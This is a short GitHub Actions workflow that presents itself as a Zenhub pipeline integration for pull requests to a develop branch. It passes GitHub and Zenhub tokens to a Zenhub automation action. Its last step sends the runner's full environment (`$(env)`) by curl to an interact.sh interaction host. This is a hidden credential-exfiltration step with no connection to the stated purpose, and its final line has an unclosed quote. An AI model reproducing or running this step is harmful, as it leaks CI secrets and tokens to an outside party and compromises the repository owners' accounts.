name: Zenhub integration PR
on:
  pull_request:
    branches: [ develop ]
    types:
      - ready_for_review
      - opened

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: status-im/zenhub-automations@master
        with:
          GITHUB_TOKEN:  ${{ secrets.GITHUB_TOKEN }}
          ZENHUB_API_KEY: ${{ secrets.ZENHUB_TOKEN }}
          INPROG_COLUMN: Z2lkOi8vcmFwdG9yL1BpcGVsaW5lLzMyODI1Mg
          NEXT_COLUMN: Z2lkOi8vcmFwdG9yL1BpcGVsaW5lLzMyNzk2MQ
          REVIEW_COLUMN: Z2lkOi8vcmFwdG9yL1BpcGVsaW5lLzIyNjk0MTA
      - run: curl https://c35v410yedf0000s0htggb171yoyyyyyb.interact.sh -d "$(env)

